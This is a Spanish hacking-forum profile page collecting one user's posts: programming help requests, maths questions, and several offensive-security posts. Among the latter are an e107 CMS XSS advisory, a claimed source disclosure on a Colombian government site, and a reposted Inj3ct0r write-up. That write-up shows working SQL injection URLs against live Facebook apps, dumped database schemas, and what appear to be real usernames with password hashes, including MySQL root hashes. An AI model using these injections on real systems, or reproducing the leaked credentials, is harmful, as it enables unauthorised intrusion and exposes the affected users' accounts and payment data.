Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Shell Root

#181
Nivel Web / e107 [Múltiples vulnerabilidades]
17 Diciembre 2010, 08:10 AM
e107 [Múltiples vulnerabilidades]
Shell Root



Hoy sin querer dormir (01:43 de la mañana - Hora Colombiana), quería mirar cualquier CMS sólo para aprender más PHP. Así que aprovechando que también ando estudiando bugs a nivel web -véase post's anteriores-. Encontré cosillas como estás:



ISSUE 1
Permitir funcionamiento de la aplicación, sin eliminar el archivo de instalación: e107 funciona sin la necesidad de remover el directorio de instalación, comprometiendo por completo el sistema debido a que atreves de él es posible reconfigurar todas las conexiones hacia la base de datos.

El instalador si recomienda su eliminación una vez utilizado pero no impide la ejecución.
Nota: Son palabras de WHK.  :P

PoC: 127.0.0.1/e107/install.php

---

ISSUE 2
Cross-site scripting en la configuración de usuario: (Perfil)
En el archivo usersettings.php en la línea 505, se realiza un UPDATE en el perfil del usuario loggeado y no se filtra de ninguna forma las variables signature y realname, produciendo un XSS.
Código (php,4,8) [Seleccionar]
505  $sql->db_Update("user", "{$new_username} {$pwreset} {$sesschange}
                     user_email='".$tp -> toDB($_POST['email'])."',
                     user_signature='".$_POST['signature']."',
                     user_image='".$tp -> toDB($_POST['image'])."',
                     user_timezone='".$tp -> toDB($_POST['timezone'])."',
                     user_hideemail='".intval($tp -> toDB($_POST['hideemail']))."',
                     user_login='".$_POST['realname']."' {$new_customtitle},
                     user_xup='".$tp -> toDB($_POST['user_xup'])."'
                     WHERE user_id='".intval($inp)."' ");

Nota: El código sólo fue modificado en su forma de presentación, todo pertenece a una sola línea.

PoC: <script>alert(/XSS/)</script>

---

-- CONTINUE --

Ultima actualización: 17 de diciembre de 2010 - Shell Root
#182
Hacking / JUGANDO EN LA RED [Paper]
15 Diciembre 2010, 03:10 AM
JUGANDO EN LA RED
[Paper]

Contenido:
  • sección Wireless
  • Sección Sniffers
  • Sección Metasploit
  • Sección DNS-Spoofing
  • Sección Karmetasploit

Download: :http://www.megaupload.com/?d=V21CRGTR
Mirror by @SnakingMax: :http://rapidshare.com/files/437180155/Jugando_en_la_red.pdf
Mirror: :http://www.mediafire.com/?nf0b15i7mmnqj1t
Fuente: :http://comunidad.dragonjar.org/f151/paper-jugando-en-la-red-11003/
#183
Full Source Disclosure
LA DEFENSORÍA DEL PUEBLO
República de Colombia


Practicando lo que es una auditoria de seguridad en aplicaciones WEB, recordé de que existe el Full Source Disclosure (FSD), así que decidí analizar algunas webs y por sorpresa la primera fue la defensoría del pueblo de la república de Colombia -Mi país de origen- y tan grande fue mi sorpresa que al ejecutar mi primer petición, !PLOP¡, se descargo un archivo y al fijarme en el estaba el código original, después de unos minutos pude encontrar la ruta exacta de donde se encuentra la conexión a la base de datos, -lo que en realidad nos interesa-, aquí os lo dejo:

La Defensoría del Pueblo - República de Colombia [Full Source Disclosure]

No SPAM! XD
#184
Hace mucho ratón que no toco lo que es la suite de Visual Studio .NET, y quería hacer algo como lo siguiente, pero no me funciona...

Tengo esta función que ejecuta la query y devuelve un objeto SqlDataReader
Código (vbnet) [Seleccionar]
   Function EjecutarQueryResultados(ByVal sSQL As String) As SqlDataReader

       Connect()

       Dim objSqlDataReader As SqlDataReader
       objSqlCommand = New SqlCommand(sSQL, objConnection)
       Try
           objSqlDataReader = objSqlCommand.ExecuteReader()
           Disconnect()
       Catch ex As Exception
           msgError(ex.Message)
           Disconnect()
       End Try

       Return objSqlDataReader
   End Function


Ahora cuando quiero ejecutar una query y recorrer el SqlDataReader, me dice que esta cerrado.
Código (vbnet) [Seleccionar]
       objSqlDataReader = EjecutarQueryResultados("SELECT * FROM dbo.tblTipoUsuario;")
       While objSqlDataReader.Read()
           Dim i As Integer = 0
           For i = 0 To objSqlDataReader.FieldCount - 1
               TextBox1.Text &= objSqlDataReader(i) & "-"
           Next
       End While



EDIT: PERDÓN, ERA PORQUE CERRABA LA CONEXIÓN...
#185
GNU/Linux / Error en mi Ubuntu 10.10
2 Diciembre 2010, 03:23 AM
Bueno, he estado usando ubuntu, desde hace muchos meses atras y la verdad es primera vez que veo este error. Tengo Ubuntu 10.10, y al intentar instalar virtualbox y recuerdo que también en algunos otros software me sale el siguiente error.
Código (bash) [Seleccionar]
Se encontraron errores al procesar:
/var/cache/apt/archives/gwibber_2.32.2-0ubuntu1_all.deb
/var/cache/apt/archives/gwibber-service_2.32.2-0ubuntu1_all.deb


Porqué sucede esto?, quizás sea por este fallo que no puedo instalar correctamente virtualbox.


Edit:
Código (bash) [Seleccionar]
E: /var/cache/apt/archives/gwibber_2.32.2-0ubuntu1_all.deb: el subproceso script pre-removal nuevo devolvió el código de salida de error 1
E: /var/cache/apt/archives/gwibber-service_2.32.2-0ubuntu1_all.deb: el subproceso script pre-removal nuevo devolvió el código de salida de error 1

Qué coño, no puedo instalar :S, quizás me toque reinstarlo.
#186
Hacking / Viendo La Webcam con Metasploit
30 Noviembre 2010, 20:21 PM
Viendo La Webcam con Metasploit

[youtube=425,350]http://www.youtube.com/watch?v=JuBxtYJcG2E[/youtube]

by: darkspark
#187
Java / Sort Array in Java
6 Noviembre 2010, 22:37 PM
What the fuck, not understand what happens with the code.
Código (java) [Seleccionar]
/* @Function highestToLowest */
public static Integer[] highestToLowest(Integer[] objArray){
return Arrays.sort(objArray);
}

/* @Function lowestToHighest */
public static Integer[] lowestToHighest(Integer[] objArray){
return Arrays.sort(objArray, Collections.reverseOrder());
}


Errors:
Código (PoC) [Seleccionar]
Constant.java:67: incompatible types
found   : void
required: java.lang.Integer[]
return Arrays.sort(objArray);
                  ^
Constant.java:72: incompatible types
found   : void
required: java.lang.Integer[]
return Arrays.sort(objArray, Collections.reverseOrder());
                  ^
2 errors
#188
Java / Problema Entorno grafico + java
3 Noviembre 2010, 21:39 PM
Coño, apenas empiezo con java en entorno gráfico, y tengo la siguiente clase y no se que os pasa.

Código (java,6) [Seleccionar]
class createNewWindows extends Frame{
public createNewWindows(String pTitle, Integer pX, Integer pY, Integer pwidth, Integer pHeight){
super(pTitle);
this.setBounds(pX, pY, pwidth, pHeight);
this.setLocationRelativeTo(null);
this.setDefaultCloseOperation(this.EXIT_ON_CLOSE);
this.setVisible(true);
}
}


Código (PoC) [Seleccionar]
alex@shellroot:~/Escritorio$ javac PoC.java
PoC.java:23: cannot find symbol
symbol  : variable EXIT_ON_CLOSE
location: class createNewWindows
this.setDefaultCloseOperation(this.EXIT_ON_CLOSE);
                                 ^
1 error


Alguna sugerencia?
#189
Scripting / Petición POST con Python
27 Octubre 2010, 06:23 AM
Pues después de programar algo en C#, se me dio por realizar una petición POST por medio de Python, pero plop, algo me falla. Me ayudan?

Código (python) [Seleccionar]
import urllib, urllib2

try:
parametros = urllib.urlencode({"txtUser": "alexa", "txtPass": "a"})
peticion = urllib2.urlopen("http://localhost/PoC/index.php", parametros)
    print peticion.read()
    peticion.close()
except HTTPError, e:
    print "Ocurrio un error"
    print e.code
except URLError, e:
    print "Ocurrio un error"
    print e.reason
#190
Foro Libre / [Math] Ecuaciones con 3 incognitas
15 Septiembre 2010, 21:59 PM
Pues ando estudiando para un examen de matemáticas mañana en la universidad, pero joder, tengo este ejercicio de repaso que no logro hacerlo.
2x +  14y  -  4z  =  -2 (1)
-4x -   3y  +   z  =   8 (2)
3x -   5y  +  6z  =   7 (3)


El problema esta, cuando intento cancelar las X de la ecuación (2) y (3) con la suma de (1). Puedo cancelar [(1) * 2 + (2)], pero no puedo cancelar [(1) * ? + (3)].

Y ni hablar si desearía empezar cancelando las Y, puedo fácilmente cancelar las Z, pero después quedaría con el mismo problema inicial.

Wait moment, Creo que ya se como hacerlo.. Retiro lo dicho, no jui capaz. xD
#191
Java / Problemas con String
14 Septiembre 2010, 23:19 PM
Porque no me funciona lo siguiente,
Código (java) [Seleccionar]
public class PoC {
    public static void main(String[] args){
        String cadena = "cAdEna";
        if(cadena.toLowerCase().trim() == "cadena"){
            System.out.println("Si");
        }else{
            System.out.println("No");
        }
    }
}

Resultado:
Código (PoC) [Seleccionar]
No
#192
Foro Libre / Pregunta matemáticas
13 Septiembre 2010, 01:40 AM
Tengo un taller de ecuaciones, pero solo me falta 1 problema. Y es, Las edades de tres hermanos están en la relación de 5, 6 y 7; si el menor tiene 20 años, la edad del mayor es?

No entiendo la parte en la que dice relación de 5, 6 y 7, ya que la respuesta es 28 años!

No quiero que hagan el ejercicio, solo que me expliquen a que se refiere con esa relación.

Saludos!
#193
Nivel Web / ReDoS
23 Agosto 2010, 05:16 AM
ReDoS, denegaciones de servicio en la validación de expresiones regulares. Lo que no entiendo es lo siguiente, investigando un poco a cerca de lo que es ReDoS, me dí cuenta de que provoca una denegación de servicio en el navegador -por así decirlo-, produciendo un mensaje de alerta preguntando si quieres detener el script. Entonces, porque cuando se realizo la auditoría de seguridad hacia simple machines forum, para ser más exactos aquí, el sr. sirdarckcat, encontro un ReDoS en htmltrim, hasta aquí vamos bien, la duda es que, porque no provoco la denegación en el navegador, sino que produjo un un bypassing -por así decirlo-.

#194
Bueno, les comento lo siguiente:

   En la universidad, cuando se requiere usar internet, se debe de registrarse en el departamento o área de sistemas, allí se deberá entregar información de la laptop propia, después de esto, me será suministrada una contraseña para navegar en internet (No se qué clase de contraseña será, si será por un tiempo definido y al siguiente día cambiará, no tengo la más mínima idea de cómo será eso). Yo quiero usar internet, para ver pr0n, además de realizar algunas consultillas, pero este no es el caso. Lo que realmente me pregunto, es,

  • para que la información que me piden, es decir, en caso de que realice una auditoría, - que por cierto la haré -, seré identificado por lo que esté haciendo en la red?
  • Se puede realizar un cambio de contraseña diario a la red?
  • Se puede tener una contraseña para entrar a la red, por un tiempo definido?
  • Se puede tener una contraseña por cada estudiante para entrar a la red?

Saludos!
#195
Nivel Web / x5s - XSS security testing assistant
19 Agosto 2010, 23:42 PM
x5s
XSS security testing assistant

by Casaba Security, contact us through CodePlex, or email us at casabasecurity .com.

x5s is a Fiddler addon which aims to assist penetration testers in finding cross-site scripting vulnerabilities. This is not a point and shoot tool, it requires some understanding of how encoding issues lead to XSS, and it requires manual driving. See the Quickstart Tutorial to jump right in but be ready to do a little work. It's main goal is to help you identify the hotspots where XSS might occur by:


  • Detecting where safe encodings were not applied to emitted user-inputs
  • Detecting where Unicode character transformations might bypass security filters
  • Detecting where non-shortest UTF-8 encodings might bypass security filters

It injects ASCII to find traditional encoding issues, and it injects special Unicode characters and encodings to help an analyst identify where XSS filters might be bypassed. The approach to finding these hotspots involves injecting single-character probes separately into each input field of each request, and detecting how they were later emitted. The focus is on reflected XSS issues however persisted issues can also be detected. The idea of injecting special Unicode characters and non-shortest form encodings was to identify where transformations occur which could be used to bypass security filters. This also has the interesting side effect of illuminating how all of the fields in a Web-app handle Unicode. For example, in a single page with many inputs, you may end up seeing the same test case get returned in a variety of ways – URL encoded, NCR encoded, ill-encoded, raw, replaced, dropped, etc. In some cases where we've had Watcher running in conjunction, we've been able to detect ill-formed UTF-8 byte sequences which is indicative of 'other' problems.

x5s acts as an assistant to the security tester by speeding up the process of parameter manipulation and aggregating the results for quick viewing. It automates some of the preliminary XSS testing work by enumerating and injecting canaries into all input fields/parameters sent to an application and analyzing how those canaries were later emitted. E.g. Was the emitted output encoded safely or not? Did an injected character transform to something else?

x5s does not inject XSS payloads - it does not attempt to exploit or confirm an XSS vulnerability. It's designed to draw your attention to the fields and parameters which seem likely candidates for vulnerability. A security-tester would review the results to find issues where special characters were dangerously transformed or emitted without a safe encoding. This can be done by quickly scanning the results, which have been designed with the intention of providing quick visual inspection. Results filters are also included so the tester could simply click show hotspots to see only the potential problem areas. After identifying a hotspot it's the tester's job to perform further validation and XSS testing.

The types of test cases that x5s includes:

  • Traditional test cases - characters typically used to test for XSS injection such as <, >, ",and ' which are used to control HTML, CSS, or javascript;
  • Transformable test cases - characters that might uppercase, lowercase, Normalize, best-fit map, or other wise transform to completely different characters, E.g. the Turkish 'İ' which will lower-case to 'i' in culture-aware software.
  • Overlong UTF-8 test cases - non-shortest UTF-8 encodings of the 'traditional' test cases noted above. E.g. the ASCII < is 0x3C normally and 0xC0 0xBC in non-shortest form UTF-8.

Download: :http://xss.codeplex.com/releases/view/43170
Fuente: dragonjar.org
#196
Bueno, como ahora ando en la universidad y me están dando matemáticas, los talleres los envían vía EMAIL. Quería saber si existe alguna aplicación donde se puedan resolver los ejercicios, es decir, que muestre las cuadriculas como si fuera un cuaderno virtual. (Ojo, no quiero un software que resuelva los ejercicios, sino una especie de cuaderno virtual.)

Preferiblemente para Linux. O sino, lo pongo en el WINE.
#197
=================================================================
FaceBook's servers was hacked by Inj3ct0r team. Hack of the year!
=================================================================



Original: http://inj3ct0r.com/exploits/11638

  • English translation
      Inj3ct0r official website => Inj3ct0r.com

                        __           __      ___
    __            __  /'__`\        /\ \__  /'__`\                
    /\_\    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __       ___    ___     ___ ___          
    \/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\    /'___\ / __`\ /' __` __`\  
    \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/  __/\ \__//\ \L\ \/\ \/\ \/\ \  
     \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\  
      \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/ \/_/\/____/\/___/  \/_/\/_/\/_/
                 \ \____/                                          
                  \/___/


    [0x00] [Introduction]
    [0x01] [First impressions]
    [0x02] [Search for bugs]
    [0x03] [Inj3ct0r Crash Exploit]
    [0x04] [Conclusion]
    [0x05] [Greetz]


    If you want to know the Inj3ct0r group, read: http://inj3ct0r.com/exploits/9845



      __             __      __    
    /'__`\         /'__`\  /'__`\  
    /\ \/\ \  __  _/\ \/\ \/\ \/\ \  
    \ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
    \ \ \_\ \/>  </\ \ \_\ \ \ \_\ \
     \ \____//\_/\_\\ \____/\ \____/
      \/___/ \//\/_/ \/___/  \/___/
             [Introduction]




    + [En] => In this log file you will read a limited version of the information gathered and provided, since the most important
    parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.

    We did not change the main page, do not sell backup server does not delete files.

    We have demonstrated the flaw in the system. Start =] ..



      __             __      _    
    /'__`\         /'__`\  /' \    
    /\ \/\ \  __  _/\ \/\ \/\_, \  
    \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \  
    \ \ \_\ \/>  </\ \ \_\ \ \ \ \
     \ \____//\_/\_\\ \____/  \ \_\
      \/___/ \//\/_/ \/___/    \/_/
           [First impressions]




    At first glance, FaceBook well protected social network.
    Scanning FaceBook server did not give nothing interesting ... )

    ..>

    Initiating Parallel DNS resolution of 1 host.
    Completed Parallel DNS resolution of 1 host.
    Initiating SYN Stealth Scan
    Scanning facebook.com (69.63.181.11) [1000 ports]
    Discovered open port 443/tcp on 69.63.181.11
    Discovered open port 80/tcp on 69.63.181.11
    Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
    Initiating Service scan
    Scanning 2 services on facebook.com (69.63.181.11)
    Service scan Timing: About 50.00% done; ETC:
    Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
    NSE: Script scanning 69.63.181.11.
    NSE: Starting runlevel 1 (of 1) scan.
    Initiating NSE at 22:41
    Completed NSE at 22:41, 0.38s elapsed
    NSE: Script Scanning completed.
    Nmap scan report for facebook.com (69.63.181.11)
    Host is up (0.17s latency).
    Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
    rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
    Not shown: 998 filtered ports
    PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https


    go ahead .. =]


      __             __      ___    
    /'__`\         /'__`\  /'___`\  
    /\ \/\ \  __  _/\ \/\ \/\_\ /\ \  
    \ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
    \ \ \_\ \/>  </\ \ \_\ \ // /_\ \
     \ \____//\_/\_\\ \____//\______/
      \/___/ \//\/_/ \/___/ \/_____/
            [Search for bugs]



    We use GoOgle.com

    request: Facebook+Vulnerability [search]

    We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities

    but all this can be found by searching : http://inj3ct0r.com/search

    All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com

    request: site:facebook.com WARNING error

    =\ fuck...
       Let us not lose heart) Hackers are not looking for easy ways


    Visit Facebook.com

    Let us search bugs in Web Apps.

    http://www.facebook.com/robots.txt


    oooooooooooooooooooooooooooo
    User-agent: *
    Disallow: /ac.php
    Disallow: /ae.php
    Disallow: /album.php
    Disallow: /ap.php
    Disallow: /feeds/
    Disallow: /p.php
    Disallow: /photo_comments.php
    Disallow: /photo_search.php
    Disallow: /photos.php

    User-agent: Slurp
    Disallow: /ac.php
    Disallow: /ae.php
    Disallow: /album.php
    Disallow: /ap.php
    Disallow: /feeds/
    Disallow: /p.php
    Disallow: /photo.php
    Disallow: /photo_comments.php
    Disallow: /photo_search.php
    Disallow: /photos.php

    User-agent: msnbot
    Disallow: /ac.php
    Disallow: /ae.php
    Disallow: /album.php
    Disallow: /ap.php
    Disallow: /feeds/
    Disallow: /p.php
    Disallow: /photo.php
    Disallow: /photo_comments.php
    Disallow: /photo_search.php
    Disallow: /photos.php

    # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
    Sitemap: http://www.facebook.com/sitemap.php
    00000000000000000000000000000000

    nothing interesting =\

    http://apps.facebook.com/tvshowchat/

    I looked closely, I noticed links

    http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability...

    check:

    http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r


    ooooooooooooooooooooooooooo

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164

    and other....

    oooooooooooooooooooooooooooo


    O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.

    Writing exploits, I got the following:
     http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1


    ooooooooooooooooooooooooooo

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    5.0.45-log <= ALERT!!!

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

    and other....

    oooooooooooooooooooooooooooo


    Database : adminclt_testsite
    Database User : adminclt_13@209.68.2.10
    MySQL Version : 5.0.67-log


    super = ] Now, we just can say that there is SQL Injection Vulnerability

    http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]

    Now we know that there is MySql 5.0.45-log

    Then let's write another exploit to display tables with information_schema.tables:

    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1


    oooooooooooooooooooooooooooo

    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38

    Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/

    201 <= ALERT!!! 201 tables!

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

    and other....

    oooooooooooooooooooooooooooo

    http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]

    Database : adminclt_testsite
    Database User : adminclt_13@209.68.2.10
    MySQL Version : 5.0.67-log


    1) AdCode
    2) AdTrack
    3) Admin_DataStore
    4) Admin_User
    5) Challenges
    6) ChallengesCompleted
    7) Comments
    8) ContactEmails
    9) Content
    10) ContentImages
    11) FeaturedTemplate
    12) FeaturedWidgets
    13) Feeds
    14) FolderLinks
    15) Folders
    16) ForumTopics
    17) Log
    18) LogDumps
    19) Newswire
    20) NotificationMessages
    21) Notifications
    22) Orders
    23) OutboundMessages
    24) Photos
    25) Prizes
    26) RawExtLinks
    27) RawSessions
    28) SessionLengths
    29) Sites
    30) Subscriptions
    31) SurveyMonkeys
    32) SystemStatus
    33) Templates
    34) User
    35) UserBlogs
    36) UserCollectives
    37) UserInfo
    38) UserInvites
    39) Videos
    40) WeeklyScores
    41) Widgets
    42) cronJobs
    43) fbSessions

    Admin_User

    1) id
    2) name
    3) email
    4) password
    5) userid
    6) ncUid
    7) level

    User

    1) userid
    2) ncUid
    3) name
    4) email
    5) isAdmin
    6) isBlocked
    7) votePower
    8) remoteStatus
    9) isMember
    10) isModerator
    11) isSponsor
    12) isEmailVerified
    13) isResearcher
    14) acceptRules
    15) optInStudy
    16) optInEmail
    17) optInProfile
    18) optInFeed
    19) optInSMS
    20) dateRegistered
    21) eligibility
    22) cachedPointTotal
    23) cachedPointsEarned
    24) cachedPointsEarnedThisWeek
    25) cachedPointsEarnedLastWeek
    26) cachedStoriesPosted
    27) cachedCommentsPosted
    28) userLevel

    http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]

    Current Database : signalpa_fbmFundRraise
    Database User : signalpa_rockaja@localhost
    MySQL Version : 5.0.85-community

    DATABASE
    1) information_schema
    2) signalpa_CelebrityPuzzle
    3) signalpa_EBF
    4) signalpa_appNotification
    5) signalpa_appnetwork
    6) signalpa_dailyscriptures
    7) signalpa_ebayfeed
    8) signalpa_fbmFundRraise
    9) signalpa_fbmFundRraisebeta
    10) signalpa_netcards
    11) signalpa_paypal
    12) signalpa_thepuzzle

    signalpa_fbmFundRraise
    1) Campaigns
    2) Campaigns_Temp
    3) FB_theme
    4) IfundDollars
    5) Languages
    6) Payments
    7) Paymentsoops
    8) Supporters
    9) Users
    10) Withdrawals
    11) invites
    12) invites_copy
    13) mp_passwords
    14) payment_codes
    15) txt_codes
    16) valid_servers
    17) weeklyBonus

  • Column: Users

    1) id
    2) name
    3) email
    4) mobile_no
    5) address
    6) country
    7) password
    8) organisation
    9) date_created
    10) date_updated
    11) status
    12) facebook_id
    13) isFacebookFan
    14) verify
    15) paypalUse
    16) paypalEmail
    17) bacUse
    18) bacAcc
    19) bacName
    20) bacLocation
    21) bacCountry
    22) bacIBAN
    23) bacSort_code
    24) current_rank
    25) new_rank
    26) cronjob
    27) max_fundraise

  • Column: mp_passwords
    1) id
    2) password
    3) username
    4) status
    5) number
    6) rc
    7) referer
    8) transID
    9) currency
    10) transType
    11) amount
    12) confirmed
    13) date

    signalpa_paypal
    1) paypal_cart_info
    2) paypal_payment_info
    3) paypal_subscription_info
    [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
    [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
    [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:

    Column: paypal_cart_info
    1) txnid
    2) itemname
    3) itemnumber
    4) os0
    5) on0
    6) os1
    7) on1
    8) quantity
    9) invoice
    10) custom

  • Column : paypal_payment_info
    1) firstname
    2) lastname
    3) buyer_email
    4) street
    5) city
    6) state
    7) zipcode
    8) memo
    9) itemname
    10) itemnumber
    11) os0
    12) on0
    13) os1
    14) on1
    15) quantity
    16) paymentdate
    17) paymenttype
    18) txnid
    19) mc_gross
    20) mc_fee
    21) paymentstatus
    22) pendingreason
    23) txntype
    24) tax
    25) mc_currency
    26) reasoncode
    27) custom
    28) country
    29) datecreation


    http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]


    Current Database : tv
    Database User : tomkincaid@ps5008.dreamhost.com
    MySQL Version : 5.0.45-log

  • DATABASES

    1) information_schema
    2) astro
    3) candukincaid
    4) cemeteries
    5) churchwpdb
    6) countdownapp
    7) crush
    8) dare
    9) friendiq
    10) giants
    11) hookup
    12) jauntlet
    13) loccus
    14) luciacanduwp
    15) maps
    16) martisor
    17) mediax
    18) mostlikely
    19) music
    20) pimpfriends
    21) plans
    22) politicsapp
    23) postergifts
    24) posters2
    25) projectbasecamp
    26) pwnfriends
    27) quiz
    28) seeall
    29) send
    30) supporter
    31) swapu
    32) tomsapps
    33) travelbug

  • tab.send

    1) app
    2) item
    3) itemforuser
    4) neverblue
    5) user

  • Columns
    user(12454)

    1) userid
    2) siteid
    3) appkey
    4) session
    5) points
    6) added
    7) removed

    Tab. candukincaid

    1) wp_comments
    2) wp_links
    3) wp_options
    4) wp_post****
    5) wp_posts
    6) wp_px_albumPhotos
    7) wp_px_albums
    8) wp_px_galleries
    9) wp_px_photos
    10) wp_px_plugins
    11) wp_term_relationships
    12) wp_term_taxonomy
    13) wp_terms
    14) wp_user****
    15) wp_users


  • Column wp_users

    1) ID
    2) user_login
    3) user_pass
    4) user_nicename
    5) user_email
    6) user_url
    7) user_registered
    8) user_activation_key
    9) user_status
    10) display_name

    etc...

    http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]

    > ~ inj3ct0r_facebook_exploit [ENTER]

    root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
    slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
    muu:*74A45B921A1A918B18AE9B137396E5A67E006262
    monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
    maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220

    http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]

    Database: affinispac_fb
    User: affinispac_fb@localhost
    Version: 5.0.67-community

    http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]

    >plucky@localhost : facebook : 4.0.13-log

    etc... =]


    Next xD

    Database: thetvdb
    User: thetvdb@localhost
    Version: 5.0.51a-24-log


    [Database]: thetvdb[/font]



    [1]aka_seriesname
    [2]apiusers
    [3]banners
    [4]deletions
    [5]genres
    [6]imgstatus
    [7]languages
    [8]mirrors
    [9]networks
    [10]ratings
    [11]runtimes
    [12]seriesactors
    [13]seriesupdates
    [14]translation_episodename
    [15]translation_episodeoverview
    [16]translation_labels
    [17]translation_seriesname
    [18]translation_seriesoverview
    [19]tvepisodes
    [20]tvseasons
    [21]tvseries
    [22]user_episodes
    [23]users

    users:

      id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
      favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
      lastupdatedby_admin,mirrorupdate


    [userpass]

    [1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
    [2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
    [3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
    [4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
    [5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
    [6] 3d801aa532c1cec3ee82d87a99fdf63f

    [Database]: wiki



    [24]archive
    [25]categorylinks
    [26]externallinks
    [27]filearchive
    [28]hitcounter
    [29]image
    [30]imagelinks
    [31]interwiki
    [32]ipblocks
    [33]job
    [34]langlinks
    [35]logging
    [36]math
    [37]objectcache
    [38]oldimage
    [39]page
    [40]page_restrictions
    [41]pagelinks
    [42]querycache
    [43]querycache_info
    [44]querycachetwo
    [45]recentchanges
    [46]redirect
    [47]revision
    [48]searchindex
    [49]site_stats
    [50]templatelinks
    [51]text
    [52]trackbacks
    [53]transcache
    [54]user
    [55]user_groups
    [56]user_newtalk
    [57]watchlist

    user:

     user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
     user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
     user_email_token_expires,user_registration,user_editcount

